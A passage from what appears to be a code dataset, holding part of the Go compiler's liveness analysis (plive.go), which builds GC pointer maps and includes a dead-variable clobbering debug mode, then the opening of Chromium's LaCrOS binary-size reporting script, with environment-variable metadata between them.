// lv.fn.Func.Dcl, but they might still be referenced by
// OpVarFoo pseudo-ops. Ignore them to prevent "lost track of
// variable" ICEs (issue 19632).
switch v.Op {
case ssa.OpVarDef, ssa.OpVarKill, ssa.OpVarLive, ssa.OpKeepAlive:
if !n.Name.Used() {
return -1, 0
}
}
var effect liveEffect
if n.Addrtaken() {
if v.Op != ssa.OpVarKill {
effect |= avarinit
}
if v.Op == ssa.OpVarDef || v.Op == ssa.OpVarKill {
effect |= varkill
}
} else {
// Read is a read, obviously.
// Addr by itself is also implicitly a read.
//
// Addr|Write means that the address is being taken
// but only so that the instruction can write to the value.
// It is not a read.
if e&ssa.SymRead != 0 || e&(ssa.SymAddr|ssa.SymWrite) == ssa.SymAddr {
effect |= uevar
}
if e&ssa.SymWrite != 0 && (!isfat(n.Type) || v.Op == ssa.OpVarDef) {
effect |= varkill
}
}
if effect == 0 {
return -1, 0
}
if pos, ok := lv.idx[n]; ok {
return pos, effect
}
return -1, 0
}
// affectedNode returns the *Node affected by v
func affectedNode(v *ssa.Value) (*Node, ssa.SymEffect) {
// Special cases.
switch v.Op {
case ssa.OpLoadReg:
n, _ := AutoVar(v.Args[0])
return n, ssa.SymRead
case ssa.OpStoreReg:
n, _ := AutoVar(v)
return n, ssa.SymWrite
case ssa.OpVarLive:
return v.Aux.(*Node), ssa.SymRead
case ssa.OpVarDef, ssa.OpVarKill:
return v.Aux.(*Node), ssa.SymWrite
case ssa.OpKeepAlive:
n, _ := AutoVar(v.Args[0])
return n, ssa.SymRead
}
e := v.Op.SymEffect()
if e == 0 {
return nil, 0
}
switch a := v.Aux.(type) {
case nil, *obj.LSym:
// ok, but no node
return nil, e
case *Node:
return a, e
default:
Fatalf("weird aux: %s", v.LongString())
return nil, e
}
}
// Constructs a new liveness structure used to hold the global state of the
// liveness computation. The cfg argument is a slice of *BasicBlocks and the
// vars argument is a slice of *Nodes.
func newliveness(fn *Node, f *ssa.Func, vars []*Node, idx map[*Node]int32, stkptrsize int64) *Liveness {
lv := &Liveness{
fn: fn,
f: f,
vars: vars,
idx: idx,
stkptrsize: stkptrsize,
be: make([]BlockEffects, f.NumBlocks()),
}
nblocks := int32(len(f.Blocks))
nvars := int32(len(vars))
bulk := bvbulkalloc(nvars, nblocks*7)
for _, b := range f.Blocks {
be := lv.blockEffects(b)
be.uevar = bulk.next()
be.varkill = bulk.next()
be.livein = bulk.next()
be.liveout = bulk.next()
be.avarinit = bulk.next()
be.avarinitany = bulk.next()
be.avarinitall = bulk.next()
}
return lv
}
func (lv *Liveness) blockEffects(b *ssa.Block) *BlockEffects {
return &lv.be[b.ID]
}
// NOTE: The bitmap for a specific type t could be cached in t after
// the first run and then simply copied into bv at the correct offset
// on future calls with the same type t.
func onebitwalktype1(t *types.Type, off int64, bv bvec) {
if t.Align > 0 && off&int64(t.Align-1) != 0 {
Fatalf("onebitwalktype1: invalid initial alignment, %v", t)
}
switch t.Etype {
case TINT8, TUINT8, TINT16, TUINT16,
TINT32, TUINT32, TINT64, TUINT64,
TINT, TUINT, TUINTPTR, TBOOL,
TFLOAT32, TFLOAT64, TCOMPLEX64, TCOMPLEX128:
case TPTR32, TPTR64, TUNSAFEPTR, TFUNC, TCHAN, TMAP:
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid alignment, %v", t)
}
bv.Set(int32(off / int64(Widthptr))) // pointer
case TSTRING:
// struct { byte *str; intgo len; }
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid alignment, %v", t)
}
bv.Set(int32(off / int64(Widthptr))) //pointer in first slot
case TINTER:
// struct { Itab *tab; void *data; }
// or, when isnilinter(t)==true:
// struct { Type *type; void *data; }
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid alignment, %v", t)
}
// The first word of an interface is a pointer, but we don't
// treat it as such.
// 1. If it is a non-empty interface, the pointer points to an itab
// which is always in persistentalloc space.
// 2. If it is an empty interface, the pointer points to a _type.
// a. If it is a compile-time-allocated type, it points into
// the read-only data section.
// b. If it is a reflect-allocated type, it points into the Go heap.
// Reflect is responsible for keeping a reference to
// the underlying type so it won't be GCd.
// If we ever have a moving GC, we need to change this for 2b (as
// well as scan itabs to update their itab._type fields).
bv.Set(int32(off/int64(Widthptr) + 1)) // pointer in second slot
case TSLICE:
// struct { byte *array; uintgo len; uintgo cap; }
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid TARRAY alignment, %v", t)
}
bv.Set(int32(off / int64(Widthptr))) // pointer in first slot (BitsPointer)
case TARRAY:
elt := t.Elem()
if elt.Width == 0 {
// Short-circuit for #20739.
break
}
for i := int64(0); i < t.NumElem(); i++ {
onebitwalktype1(elt, off, bv)
off += elt.Width
}
case TSTRUCT:
for _, f := range t.Fields().Slice() {
onebitwalktype1(f.Type, off+f.Offset, bv)
}
default:
Fatalf("onebitwalktype1: unexpected type, %v", t)
}
}
// localWords returns the number of words of local variables.
func (lv *Liveness) localWords() int32 {
return int32(lv.stkptrsize / int64(Widthptr))
}
// argWords returns the number of words of in and out arguments.
func (lv *Liveness) argWords() int32 {
return int32(lv.fn.Type.ArgWidth() / int64(Widthptr))
}
// Generates live pointer value maps for arguments and local variables. The
// this argument and the in arguments are always assumed live. The vars
// argument is a slice of *Nodes.
func (lv *Liveness) pointerMap(liveout bvec, vars []*Node, args, locals bvec) {
for i := int32(0); ; i++ {
i = liveout.Next(i)
if i < 0 {
break
}
node := vars[i]
switch node.Class() {
case PAUTO:
onebitwalktype1(node.Type, node.Xoffset+lv.stkptrsize, locals)
case PPARAM, PPARAMOUT:
onebitwalktype1(node.Type, node.Xoffset, args)
}
}
}
// Returns true for instructions that are safe points that must be annotated
// with liveness information.
func issafepoint(v *ssa.Value) bool {
return v.Op.IsCall()
}
// Initializes the sets for solving the live variables. Visits all the
// instructions in each basic block to summarize the information at each basic
// block.
func (lv *Liveness) prologue() {
lv.initcache()
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
// Walk the block instructions backward and update the block
		// effects with each value's effects.
for j := len(b.Values) - 1; j >= 0; j-- {
pos, e := lv.valueEffects(b.Values[j])
if e&varkill != 0 {
be.varkill.Set(pos)
be.uevar.Unset(pos)
}
if e&uevar != 0 {
be.uevar.Set(pos)
}
}
// Walk the block instructions forward to update avarinit bits.
// avarinit describes the effect at the end of the block, not the beginning.
for _, val := range b.Values {
pos, e := lv.valueEffects(val)
if e&varkill != 0 {
be.avarinit.Unset(pos)
}
if e&avarinit != 0 {
be.avarinit.Set(pos)
}
}
}
}
// Solve the liveness dataflow equations.
func (lv *Liveness) solve() {
// These temporary bitvectors exist to avoid successive allocations and
// frees within the loop.
newlivein := bvalloc(int32(len(lv.vars)))
newliveout := bvalloc(int32(len(lv.vars)))
any := bvalloc(int32(len(lv.vars)))
all := bvalloc(int32(len(lv.vars)))
// Push avarinitall, avarinitany forward.
// avarinitall says the addressed var is initialized along all paths reaching the block exit.
// avarinitany says the addressed var is initialized along some path reaching the block exit.
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
if b == lv.f.Entry {
be.avarinitall.Copy(be.avarinit)
} else {
be.avarinitall.Clear()
be.avarinitall.Not()
}
be.avarinitany.Copy(be.avarinit)
}
// Walk blocks in the general direction of propagation (RPO
// for avarinit{any,all}, and PO for live{in,out}). This
// improves convergence.
po := lv.f.Postorder()
for change := true; change; {
change = false
for i := len(po) - 1; i >= 0; i-- {
b := po[i]
be := lv.blockEffects(b)
lv.avarinitanyall(b, any, all)
any.AndNot(any, be.varkill)
all.AndNot(all, be.varkill)
any.Or(any, be.avarinit)
all.Or(all, be.avarinit)
if !any.Eq(be.avarinitany) {
change = true
be.avarinitany.Copy(any)
}
if !all.Eq(be.avarinitall) {
change = true
be.avarinitall.Copy(all)
}
}
}
// Iterate through the blocks in reverse round-robin fashion. A work
// queue might be slightly faster. As is, the number of iterations is
// so low that it hardly seems to be worth the complexity.
for change := true; change; {
change = false
for _, b := range po {
be := lv.blockEffects(b)
newliveout.Clear()
switch b.Kind {
case ssa.BlockRet:
for _, pos := range lv.cache.retuevar {
newliveout.Set(pos)
}
case ssa.BlockRetJmp:
for _, pos := range lv.cache.tailuevar {
newliveout.Set(pos)
}
case ssa.BlockExit:
// nothing to do
default:
// A variable is live on output from this block
// if it is live on input to some successor.
//
// out[b] = \bigcup_{s \in succ[b]} in[s]
newliveout.Copy(lv.blockEffects(b.Succs[0].Block()).livein)
for _, succ := range b.Succs[1:] {
newliveout.Or(newliveout, lv.blockEffects(succ.Block()).livein)
}
}
if !be.liveout.Eq(newliveout) {
change = true
be.liveout.Copy(newliveout)
}
// A variable is live on input to this block
// if it is live on output from this block and
// not set by the code in this block.
//
// in[b] = uevar[b] \cup (out[b] \setminus varkill[b])
newlivein.AndNot(be.liveout, be.varkill)
be.livein.Or(newlivein, be.uevar)
}
}
}
// Visits all instructions in a basic block and computes a bit vector of live
// variables at each safe point location.
func (lv *Liveness) epilogue() {
nvars := int32(len(lv.vars))
liveout := bvalloc(nvars)
any := bvalloc(nvars)
all := bvalloc(nvars)
livedefer := bvalloc(nvars) // always-live variables
// If there is a defer (that could recover), then all output
// parameters are live all the time. In addition, any locals
// that are pointers to heap-allocated output parameters are
// also always live (post-deferreturn code needs these
// pointers to copy values back to the stack).
// TODO: if the output parameter is heap-allocated, then we
// don't need to keep the stack copy live?
if lv.fn.Func.HasDefer() {
for i, n := range lv.vars {
if n.Class() == PPARAMOUT {
if n.IsOutputParamHeapAddr() {
// Just to be paranoid. Heap addresses are PAUTOs.
Fatalf("variable %v both output param and heap output param", n)
}
if n.Name.Param.Heapaddr != nil {
// If this variable moved to the heap, then
// its stack copy is not live.
continue
}
// Note: zeroing is handled by zeroResults in walk.go.
livedefer.Set(int32(i))
}
if n.IsOutputParamHeapAddr() {
n.Name.SetNeedzero(true)
livedefer.Set(int32(i))
}
}
}
{
// Reserve an entry for function entry.
live := bvalloc(nvars)
for _, pos := range lv.cache.textavarinit {
live.Set(pos)
}
lv.livevars = append(lv.livevars, live)
}
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
// Compute avarinitany and avarinitall for entry to block.
// This duplicates information known during livenesssolve
// but avoids storing two more vectors for each block.
lv.avarinitanyall(b, any, all)
// Walk forward through the basic block instructions and
// allocate liveness maps for those instructions that need them.
// Seed the maps with information about the addrtaken variables.
for _, v := range b.Values {
pos, e := lv.valueEffects(v)
if e&varkill != 0 {
any.Unset(pos)
all.Unset(pos)
}
if e&avarinit != 0 {
any.Set(pos)
all.Set(pos)
}
if !issafepoint(v) {
continue
}
// Annotate ambiguously live variables so that they can
// be zeroed at function entry and at VARKILL points.
// liveout is dead here and used as a temporary.
liveout.AndNot(any, all)
if !liveout.IsEmpty() {
for pos := int32(0); pos < liveout.n; pos++ {
if !liveout.Get(pos) {
continue
}
all.Set(pos) // silence future warnings in this block
n := lv.vars[pos]
if !n.Name.Needzero() {
n.Name.SetNeedzero(true)
if debuglive >= 1 {
Warnl(v.Pos, "%v: %L is ambiguously live", lv.fn.Func.Nname, n)
}
}
}
}
// Live stuff first.
live := bvalloc(nvars)
live.Copy(any)
lv.livevars = append(lv.livevars, live)
}
be.lastbitmapindex = len(lv.livevars) - 1
}
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
// walk backward, construct maps at each safe point
index := int32(be.lastbitmapindex)
if index < 0 {
// the first block we encounter should have the ATEXT so
// at no point should pos ever be less than zero.
Fatalf("livenessepilogue")
}
liveout.Copy(be.liveout)
for i := len(b.Values) - 1; i >= 0; i-- {
v := b.Values[i]
if issafepoint(v) {
// Found an interesting instruction, record the
// corresponding liveness information.
live := lv.livevars[index]
live.Or(live, liveout)
live.Or(live, livedefer) // only for non-entry safe points
index--
}
// Update liveness information.
pos, e := lv.valueEffects(v)
if e&varkill != 0 {
liveout.Unset(pos)
}
if e&uevar != 0 {
liveout.Set(pos)
}
}
if b == lv.f.Entry {
if index != 0 {
Fatalf("bad index for entry point: %v", index)
}
// Record live variables.
live := lv.livevars[index]
live.Or(live, liveout)
}
}
// Useful sanity check: on entry to the function,
// the only things that can possibly be live are the
// input parameters.
for j, n := range lv.vars {
if n.Class() != PPARAM && lv.livevars[0].Get(int32(j)) {
Fatalf("internal error: %v %L recorded as live on entry", lv.fn.Func.Nname, n)
}
}
}
func (lv *Liveness) clobber() {
// The clobberdead experiment inserts code to clobber all the dead variables (locals and args)
// before and after every safepoint. This experiment is useful for debugging the generation
// of live pointer bitmaps.
if objabi.Clobberdead_enabled == 0 {
return
}
var varSize int64
for _, n := range lv.vars {
varSize += n.Type.Size()
}
if len(lv.livevars) > 1000 || varSize > 10000 {
// Be careful to avoid doing too much work.
// Bail if >1000 safepoints or >10000 bytes of variables.
// Otherwise, giant functions make this experiment generate too much code.
return
}
if h := os.Getenv("GOCLOBBERDEADHASH"); h != "" {
// Clobber only functions where the hash of the function name matches a pattern.
// Useful for binary searching for a miscompiled function.
hstr := ""
for _, b := range sha1.Sum([]byte(lv.fn.funcname())) {
hstr += fmt.Sprintf("%08b", b)
}
if !strings.HasSuffix(hstr, h) {
return
}
fmt.Printf("\t\t\tCLOBBERDEAD %s\n", lv.fn.funcname())
}
if lv.f.Name == "forkAndExecInChild" {
// forkAndExecInChild calls vfork (on linux/amd64, anyway).
// The code we add here clobbers parts of the stack in the child.
// When the parent resumes, it is using the same stack frame. But the
// child has clobbered stack variables that the parent needs. Boom!
// In particular, the sys argument gets clobbered.
// Note to self: GOCLOBBERDEADHASH=011100101110
return
}
var oldSched []*ssa.Value
for _, b := range lv.f.Blocks {
// Copy block's values to a temporary.
oldSched = append(oldSched[:0], b.Values...)
b.Values = b.Values[:0]
// Clobber all dead variables at entry.
if b == lv.f.Entry {
for len(oldSched) > 0 && len(oldSched[0].Args) == 0 {
// Skip argless ops. We need to skip at least
// the lowered ClosurePtr op, because it
// really wants to be first. This will also
// skip ops like InitMem and SP, which are ok.
b.Values = append(b.Values, oldSched[0])
oldSched = oldSched[1:]
}
clobber(lv, b, lv.livevars[0])
}
// Copy values into schedule, adding clobbering around safepoints.
for _, v := range oldSched {
if !issafepoint(v) {
b.Values = append(b.Values, v)
continue
}
before := true
if v.Op.IsCall() && v.Aux != nil && v.Aux.(*obj.LSym) == typedmemmove {
// Can't put clobber code before the call to typedmemmove.
// The variable to-be-copied is marked as dead
// at the callsite. That is ok, though, as typedmemmove
// is marked as nosplit, and the first thing it does
// is to call memmove (also nosplit), after which
// the source value is dead.
// See issue 16026.
before = false
}
if before {
clobber(lv, b, lv.livevars[lv.stackMapIndex[v]])
}
b.Values = append(b.Values, v)
clobber(lv, b, lv.livevars[lv.stackMapIndex[v]])
}
}
}
// clobber generates code to clobber all dead variables (those not marked in live).
// Clobbering instructions are added to the end of b.Values.
func clobber(lv *Liveness, b *ssa.Block, live bvec) {
for i, n := range lv.vars {
if !live.Get(int32(i)) {
clobberVar(b, n)
}
}
}
// clobberVar generates code to trash the pointers in v.
// Clobbering instructions are added to the end of b.Values.
func clobberVar(b *ssa.Block, v *Node) {
clobberWalk(b, v, 0, v.Type)
}
// b = block to which we append instructions
// v = variable
// offset = offset of (sub-portion of) variable to clobber (in bytes)
// t = type of sub-portion of v.
func clobberWalk(b *ssa.Block, v *Node, offset int64, t *types.Type) {
if !types.Haspointers(t) {
return
}
switch t.Etype {
case TPTR32,
TPTR64,
TUNSAFEPTR,
TFUNC,
TCHAN,
TMAP:
clobberPtr(b, v, offset)
case TSTRING:
// struct { byte *str; int len; }
clobberPtr(b, v, offset)
case TINTER:
// struct { Itab *tab; void *data; }
// or, when isnilinter(t)==true:
// struct { Type *type; void *data; }
// Note: the first word isn't a pointer. See comment in plive.go:onebitwalktype1.
clobberPtr(b, v, offset+int64(Widthptr))
case TSLICE:
// struct { byte *array; int len; int cap; }
clobberPtr(b, v, offset)
case TARRAY:
for i := int64(0); i < t.NumElem(); i++ {
clobberWalk(b, v, offset+i*t.Elem().Size(), t.Elem())
}
case TSTRUCT:
for _, t1 := range t.Fields().Slice() {
clobberWalk(b, v, offset+t1.Offset, t1.Type)
}
default:
Fatalf("clobberWalk: unexpected type, %v", t)
}
}
// clobberPtr generates a clobber of the pointer at offset offset in v.
// The clobber instruction is added at the end of b.
func clobberPtr(b *ssa.Block, v *Node, offset int64) {
b.NewValue0IA(src.NoXPos, ssa.OpClobber, types.TypeVoid, offset, v)
}
func (lv *Liveness) avarinitanyall(b *ssa.Block, any, all bvec) {
if len(b.Preds) == 0 {
any.Clear()
all.Clear()
for _, pos := range lv.cache.textavarinit {
any.Set(pos)
all.Set(pos)
}
return
}
be := lv.blockEffects(b.Preds[0].Block())
any.Copy(be.avarinitany)
all.Copy(be.avarinitall)
for _, pred := range b.Preds[1:] {
be := lv.blockEffects(pred.Block())
any.Or(any, be.avarinitany)
all.And(all, be.avarinitall)
}
}
// FNV-1 hash function constants.
const (
H0 = 2166136261
Hp = 16777619
)
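// hashbitmap folds the bits of bv into the running FNV-1 hash h, one byte of
// each 32-bit word at a time, and returns the updated hash value.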
func hashbitmap(h uint32, bv bvec) uint32 {
n := int((bv.n + 31) / 32)
for i := 0; i < n; i++ {
w := bv.b[i]
h = (h * Hp) ^ (w & 0xff)
h = (h * Hp) ^ ((w >> 8) & 0xff)
h = (h * Hp) ^ ((w >> 16) & 0xff)
h = (h * Hp) ^ ((w >> 24) & 0xff)
}
return h
}
// Compact liveness information by coalescing identical per-call-site bitmaps.
// The merging only happens for a single function, not across the entire binary.
//
// There are actually two lists of bitmaps, one list for the local variables and one
// list for the function arguments. Both lists are indexed by the same PCDATA
// index, so the corresponding pairs must be considered together when
// merging duplicates. The argument bitmaps change much less often during
// function execution than the local variable bitmaps, so it is possible that
// we could introduce a separate PCDATA index for arguments vs locals and
// then compact the set of argument bitmaps separately from the set of
// local variable bitmaps. As of 2014-04-02, doing this to the godoc binary
// is actually a net loss: we save about 50k of argument bitmaps but the new
// PCDATA tables cost about 100k. So for now we keep using a single index for
// both bitmap lists.
func (lv *Liveness) compact() {
// Linear probing hash table of bitmaps seen so far.
// The hash table has 4n entries to keep the linear
// scan short. An entry of -1 indicates an empty slot.
n := len(lv.livevars)
tablesize := 4 * n
table := make([]int, tablesize)
for i := range table {
table[i] = -1
}
// remap[i] = the new index of the old bit vector #i.
remap := make([]int, n)
for i := range remap {
remap[i] = -1
}
uniq := 0 // unique tables found so far
// Consider bit vectors in turn.
// If new, assign next number using uniq,
// record in remap, record in lv.livevars
// under the new index, and add entry to hash table.
// If already seen, record earlier index in remap.
Outer:
for i, live := range lv.livevars {
h := hashbitmap(H0, live) % uint32(tablesize)
for {
j := table[h]
if j < 0 {
break
}
jlive := lv.livevars[j]
if live.Eq(jlive) {
remap[i] = j
continue Outer
}
h++
if h == uint32(tablesize) {
h = 0
}
}
table[h] = uniq
remap[i] = uniq
lv.livevars[uniq] = live
uniq++
}
// We've already reordered lv.livevars[0:uniq]. Clear the
// pointers later in the array so they can be GC'd.
tail := lv.livevars[uniq:]
for i := range tail { // memclr loop pattern
tail[i] = bvec{}
}
lv.livevars = lv.livevars[:uniq]
// Record compacted stack map indexes for each value.
// These will later become PCDATA instructions.
lv.showlive(nil, lv.livevars[0])
pos := 1
lv.stackMapIndex = make(map[*ssa.Value]int)
for _, b := range lv.f.Blocks {
for _, v := range b.Values {
if issafepoint(v) {
lv.showlive(v, lv.livevars[remap[pos]])
lv.stackMapIndex[v] = remap[pos]
pos++
}
}
}
}
func (lv *Liveness) showlive(v *ssa.Value, live bvec) {
if debuglive == 0 || lv.fn.funcname() == "init" || strings.HasPrefix(lv.fn.funcname(), ".") {
return
}
if live.IsEmpty() {
return
}
pos := lv.fn.Func.Nname.Pos
if v != nil {
pos = v.Pos
}
s := "live at "
if v == nil {
s += fmt.Sprintf("entry to %s:", lv.fn.funcname())
} else if sym, ok := v.Aux.(*obj.LSym); ok {
fn := sym.Name
if pos := strings.Index(fn, "."); pos >= 0 {
fn = fn[pos+1:]
}
s += fmt.Sprintf("call to %s:", fn)
} else {
s += "indirect call:"
}
for j, n := range lv.vars {
if live.Get(int32(j)) {
s += fmt.Sprintf(" %v", n)
}
}
Warnl(pos, s)
}
func (lv *Liveness) printbvec(printed bool, name string, live bvec) bool {
started := false
for i, n := range lv.vars {
if !live.Get(int32(i)) {
continue
}
if !started {
if !printed {
fmt.Printf("\t")
} else {
fmt.Printf(" ")
}
started = true
printed = true
fmt.Printf("%s=", name)
} else {
fmt.Printf(",")
}
fmt.Printf("%s", n.Sym.Name)
}
return printed
}
// printeffect is like printbvec, but for a single variable.
func (lv *Liveness) printeffect(printed bool, name string, pos int32, x bool) bool {
if !x {
return printed
}
if !printed {
fmt.Printf("\t")
} else {
fmt.Printf(" ")
}
fmt.Printf("%s=%s", name, lv.vars[pos].Sym.Name)
return true
}
// Prints the computed liveness information and inputs, for debugging.
// This format synthesizes the information used during the multiple passes
// into a single presentation.
func (lv *Liveness) printDebug() {
fmt.Printf("liveness: %s\n", lv.fn.funcname())
pcdata := 0
for i, b := range lv.f.Blocks {
if i > 0 {
fmt.Printf("\n")
}
// bb#0 pred=1,2 succ=3,4
fmt.Printf("bb#%d pred=", b.ID)
for j, pred := range b.Preds {
if j > 0 {
fmt.Printf(",")
}
fmt.Printf("%d", pred.Block().ID)
}
fmt.Printf(" succ=")
for j, succ := range b.Succs {
if j > 0 {
fmt.Printf(",")
}
fmt.Printf("%d", succ.Block().ID)
}
fmt.Printf("\n")
be := lv.blockEffects(b)
// initial settings
printed := false
printed = lv.printbvec(printed, "uevar", be.uevar)
printed = lv.printbvec(printed, "livein", be.livein)
if printed {
fmt.Printf("\n")
}
// program listing, with individual effects listed
if b == lv.f.Entry {
live := lv.livevars[pcdata]
fmt.Printf("(%s) function entry\n", linestr(lv.fn.Func.Nname.Pos))
fmt.Printf("\tlive=")
printed = false
for j, n := range lv.vars {
if !live.Get(int32(j)) {
continue
}
if printed {
fmt.Printf(",")
}
fmt.Printf("%v", n)
printed = true
}
fmt.Printf("\n")
}
for _, v := range b.Values {
fmt.Printf("(%s) %v\n", linestr(v.Pos), v.LongString())
if pos, ok := lv.stackMapIndex[v]; ok {
pcdata = pos
}
pos, effect := lv.valueEffects(v)
printed = false
printed = lv.printeffect(printed, "uevar", pos, effect&uevar != 0)
printed = lv.printeffect(printed, "varkill", pos, effect&varkill != 0)
printed = lv.printeffect(printed, "avarinit", pos, effect&avarinit != 0)
if printed {
fmt.Printf("\n")
}
if !issafepoint(v) {
continue
}
live := lv.livevars[pcdata]
fmt.Printf("\tlive=")
printed = false
for j, n := range lv.vars {
if !live.Get(int32(j)) {
continue
}
if printed {
fmt.Printf(",")
}
fmt.Printf("%v", n)
printed = true
}
fmt.Printf("\n")
}
// bb bitsets
fmt.Printf("end\n")
printed = false
printed = lv.printbvec(printed, "varkill", be.varkill)
printed = lv.printbvec(printed, "liveout", be.liveout)
printed = lv.printbvec(printed, "avarinit", be.avarinit)
printed = lv.printbvec(printed, "avarinitany", be.avarinitany)
printed = lv.printbvec(printed, "avarinitall", be.avarinitall)
if printed {
fmt.Printf("\n")
}
}
fmt.Printf("\n")
}
// Dumps a slice of bitmaps to a symbol as a sequence of uint32 values. The
// first word dumped is the total number of bitmaps. The second word is the
// length of the bitmaps. All bitmaps are assumed to be of equal length. The
// remaining bytes are the raw bitmaps.
func (lv *Liveness) emit(argssym, livesym *obj.LSym) {
args := bvalloc(lv.argWords())
aoff := duint32(argssym, 0, uint32(len(lv.livevars))) // number of bitmaps
aoff = duint32(argssym, aoff, uint32(args.n)) // number of bits in each bitmap
locals := bvalloc(lv.localWords())
loff := duint32(livesym, 0, uint32(len(lv.livevars))) // number of bitmaps
loff = duint32(livesym, loff, uint32(locals.n)) // number of bits in each bitmap
for _, live := range lv.livevars {
args.Clear()
locals.Clear()
lv.pointerMap(live, lv.vars, args, locals)
aoff = dbvec(argssym, aoff, args)
loff = dbvec(livesym, loff, locals)
}
// Give these LSyms content-addressable names,
// so that they can be de-duplicated.
// This provides significant binary size savings.
// It is safe to rename these LSyms because
// they are tracked separately from ctxt.hash.
argssym.Name = fmt.Sprintf("gclocals·%x", md5.Sum(argssym.P))
livesym.Name = fmt.Sprintf("gclocals·%x", md5.Sum(livesym.P))
}
// Entry point for liveness analysis. Solves for the liveness of
// pointer variables in the function and emits a runtime data
// structure read by the garbage collector.
// Returns a map from GC safe points to their corresponding stack map index.
func liveness(e *ssafn, f *ssa.Func) map[*ssa.Value]int {
// Construct the global liveness state.
vars, idx := getvariables(e.curfn)
lv := newliveness(e.curfn, f, vars, idx, e.stkptrsize)
// Run the dataflow framework.
lv.prologue()
lv.solve()
lv.epilogue()
lv.compact()
lv.clobber()
if debuglive >= 2 {
lv.printDebug()
}
// Emit the live pointer map data structures
if ls := e.curfn.Func.lsym; ls != nil {
lv.emit(&ls.Func.GCArgs, &ls.Func.GCLocals)
}
return lv.stackMapIndex
}
| [
"\"GOCLOBBERDEADHASH\""
]
| []
| [
"GOCLOBBERDEADHASH"
]
| [] | ["GOCLOBBERDEADHASH"] | go | 1 | 0 | |
build/lacros/lacros_resource_sizes.py | #!/usr/bin/env python
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Reports binary size metrics for LaCrOS build artifacts.
More information at //docs/speed/binary_size/metrics.md.
"""
import argparse
import collections
import contextlib
import json
import logging
import os
import subprocess
import sys
import tempfile
@contextlib.contextmanager
def _SysPath(path):
"""Library import context that temporarily appends |path| to |sys.path|."""
if path and path not in sys.path:
sys.path.insert(0, path)
else:
path = None # Indicates that |sys.path| is not modified.
try:
yield
finally:
if path:
sys.path.pop(0)
DIR_SOURCE_ROOT = os.environ.get(
'CHECKOUT_SOURCE_ROOT',
os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)))
BUILD_COMMON_PATH = os.path.join(DIR_SOURCE_ROOT, 'build', 'util', 'lib',
'common')
TRACING_PATH = os.path.join(DIR_SOURCE_ROOT, 'third_party', 'catapult',
'tracing')
EU_STRIP_PATH = os.path.join(DIR_SOURCE_ROOT, 'buildtools', 'third_party',
'eu-strip', 'bin', 'eu-strip')
with _SysPath(BUILD_COMMON_PATH):
import perf_tests_results_helper # pylint: disable=import-error
with _SysPath(TRACING_PATH):
from tracing.value import convert_chart_json # pylint: disable=import-error
_BASE_CHART = {
'format_version': '0.1',
'benchmark_name': 'resource_sizes',
'benchmark_description': 'LaCrOS resource size information.',
'trace_rerun_options': [],
'charts': {}
}
_KEY_RAW = 'raw'
_KEY_GZIPPED = 'gzipped'
_KEY_STRIPPED = 'stripped'
_KEY_STRIPPED_GZIPPED = 'stripped_then_gzipped'
class _Group:
"""A group of build artifacts whose file sizes are summed and tracked.
Build artifacts for size tracking fall under these categories:
* File: A single file.
* Group: A collection of files.
* Dir: All files under a directory.
Attributes:
paths: A list of files or directories to be tracked together.
title: The display name of the group.
track_stripped: Whether to also track summed stripped ELF sizes.
track_compressed: Whether to also track summed compressed sizes.
"""
def __init__(self, paths, title, track_stripped=False,
track_compressed=False):
self.paths = paths
self.title = title
self.track_stripped = track_stripped
self.track_compressed = track_compressed
# List of disjoint build artifact groups for size tracking. This list should be
# synched with lacros-amd64-generic-binary-size-rel builder contents (specified
# in # //infra/config/subprojects/chromium/ci.star) and
# chromeos-amd64-generic-lacros-internal builder (specified in src-internal).
_TRACKED_GROUPS = [
_Group(paths=['chrome'],
title='File: chrome',
track_stripped=True,
track_compressed=True),
_Group(paths=['chrome_crashpad_handler'],
title='File: chrome_crashpad_handler'),
_Group(paths=['icudtl.dat'], title='File: icudtl.dat'),
_Group(paths=['nacl_helper'], title='File: nacl_helper'),
_Group(paths=['nacl_irt_x86_64.nexe'], title='File: nacl_irt_x86_64.nexe'),
_Group(paths=['resources.pak'], title='File: resources.pak'),
_Group(paths=[
'chrome_100_percent.pak', 'chrome_200_percent.pak', 'headless_lib.pak'
],
title='Group: Other PAKs'),
_Group(paths=['snapshot_blob.bin'], title='Group: Misc'),
_Group(paths=['locales/'], title='Dir: locales'),
_Group(paths=['swiftshader/'], title='Dir: swiftshader'),
_Group(paths=['WidevineCdm/'], title='Dir: WidevineCdm'),
]
def _visit_paths(base_dir, paths):
"""Itemizes files specified by a list of paths.
Args:
base_dir: Base directory for all elements in |paths|.
paths: A list of filenames or directory names to specify files whose sizes
to be counted. Directories are recursed. There's no de-duping effort.
Non-existing files or directories are ignored (with warning message).
"""
for path in paths:
full_path = os.path.join(base_dir, path)
if os.path.exists(full_path):
if os.path.isdir(full_path):
for dirpath, _, filenames in os.walk(full_path):
for filename in filenames:
yield os.path.join(dirpath, filename)
else: # Assume is file.
yield full_path
else:
logging.critical('Not found: %s', path)
def _is_probably_elf(filename):
"""Heuristically decides whether |filename| is ELF via magic signature."""
with open(filename, 'rb') as fh:
    return fh.read(4) == b'\x7FELF'
def _is_unstrippable_elf(filename):
"""Identifies known-unstrippable ELF files to denoise the system."""
return filename.endswith('.nexe') or filename.endswith('libwidevinecdm.so')
def _get_filesize(filename):
"""Returns the size of a file, or 0 if file is not found."""
try:
return os.path.getsize(filename)
except OSError:
logging.critical('Failed to get size: %s', filename)
return 0
def _get_gzipped_filesize(filename):
"""Returns the gzipped size of a file, or 0 if file is not found."""
BUFFER_SIZE = 65536
if not os.path.isfile(filename):
return 0
try:
# Call gzip externally instead of using gzip package since it's > 2x faster.
cmd = ['gzip', '-c', filename]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
# Manually counting bytes instead of using len(p.communicate()[0]) to avoid
# buffering the entire compressed data (can be ~100 MB).
ret = 0
while True:
chunk = len(p.stdout.read(BUFFER_SIZE))
if chunk == 0:
break
ret += chunk
